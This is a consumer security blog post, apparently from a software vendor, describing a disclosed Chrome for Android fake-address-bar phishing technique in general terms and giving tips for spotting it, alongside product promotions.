This Loophole in Chrome for Android Allows Phishing Attackers to Trick Users with Fake Address Bar

Get yourself protected with Outbyte VPN

30-day money back guarantee, no risk, no questions asked!

Download Outbyte VPN See more information about Outbyte and uninstall instructions. Please review EULA and Privacy Policy.

In the browser world, Google Chrome tops, – and for a good reason. Besides being easy to use, Google Chrome has a thriving extension ecosystem, a robust feature set, and it has versions for nearly all major platforms. With Chrome being the most popular browser, some nefarious developers may see it as an avenue to get sensitive information from unsuspecting users.

Let’s face it. Most people hardly check the address bar on their browser for its authenticity. To make it even worse, Chrome for Android hides the address bar after a page has loaded. So if you have not been paying attention while browsing on your phone, beware of the fake address bar on Android.

According to a security analyst James Fisher, there is a lapse on Google Chrome that could allow phishing attackers to install a fake address bar on Chrome for Android and conceal the genuine one.

Fake Address Bar Trick on Android Has Been Exposed

Fisher showed on his blog how cybercriminals can cause the content to appear as if it is hosted on the website of HSBC, a reputable organization.

A phishing hacker would test potential victims’ alertness with a fake address bar on Chrome for Android. For this exploit to succeed, the attacker relies on the possibility that users are not paying attention after scrolling down. Normally when you scroll down in Chrome for Android, the uppermost section, which has the tabs button and the address bar, slides up from view to provide more space for the page.

The inception bar, as Fisher calls it, could also prevent you from viewing the real address bar when you scroll up. Fisher stressed that if the above trick doesn’t fool users, a phishing attacker could use a padding element that prevents Chrome on Android from displaying the address bar when users scroll. Ordinarily, when a user scrolls up, Chrome for Android will redisplay the real address bar.

Fisher found out that if Chrome doesn’t display the genuine address bar, it is easy for a phishing attacker to move the entire page content to a scroll jail. The outcome of this exploit is a webpage within a webpage. Since the webpage contains its own scroll bar, users can be tricked to think they are scrolling up the page, when in the real sense, they are scrolling up the scroll jail.

Perhaps a more worrying implication of the fake address bar trick on Android is that users can’t easily leave the web page without accessing the address bar.

So far, there are no reported cases of users losing sensitive information to cybercriminals using this bar-phishing trick, but now that Fisher has reported the exploit, these attackers could use it to carry out large-scale phishing campaigns.

How to Spot a Fake Address Bar in Chrome for Android?

As we wait on Google to release an update that prevents such browser takeovers, we have suggested several strategies to help you spot a fake address bar:

  • One of the most effective ways of spotting a fake address bar in Chrome for Android is to lock your smartphone, then unlock it. By doing this, your browser will be forced to display its real address bar. And if you are facing a phishing attack, you will notice the fake address bar below the genuine one. You can view these address bars even if you have scrolled down.
  • Another trick you can use to uncover the fake address bar trick on Android is to keep a close eye on the count displayed in the tabs icon when using multiple tabs. Here, the fake address bar will display an incorrect figure.
  • With the new dark mode in Chrome for Android, it is now easy to detect a fake address bar. When this feature is active, the genuine address bar and all the UI elements will turn black while the fake one will remain white, making it easier to distinguish the legitimate address bar from the fake one.

Stay Safe

Besides the above tips, it is also important to secure your phone against malicious attacks. Use a reliable booster app to wipe out junk and optimize your phone for top performance. Outbyte AndroidCare takes care of your phone’s memory, performance, security, and battery life. Use this app to protect your sensitive information when browsing on your phone using public Wi-Fi.

A point to note is that the exploit is just a proof of concept for now. But keep in mind that there is nothing that stops phishing attackers from using such vectors to collect information from unsuspecting users.

Not long ago, Fisher raised an issue with Google’s policy for Gmail addresses. The ‘dots don’t matter’ policy presents a loophole that scammers can use to create several Gmail accounts using extra dots. While Google doesn’t distinguish dots in email addresses, other online services recognize them. Because of this loophole, scammers conned several Netflix account owners.

Final Thoughts

Google has yet to issue an official response to the fake address bar trick on Android, so there is no information on when the loophole will be fixed. Nonetheless, the above tips should help you spot a fake address bar in Chrome for Android and protect your phone from malicious attacks. In any case, it pays to protect yourself from all forms of phishing attacks. You should be more careful whenever you are browsing the web using Chrome for Android. Make sure to check back on this blog to learn more on how to protect and optimize your phone for top performance.

Click here to Download

Outbyte If you’re running into errors and your system is suspiciously slow, your computer needs some maintenance work. Download Outbyte PC Repair for Windows, Outbyte Antivirus for Windows, or Outbyte MacRepair for macOS to resolve common computer performance issues. Fix computer troubles by downloading the compatible tool for your device.
See more information about Outbyte and uninstall instructions. Please review EULA and Privacy Policy.

Leave a Reply

Your email address will not be published. Required fields are marked *

13 − nine =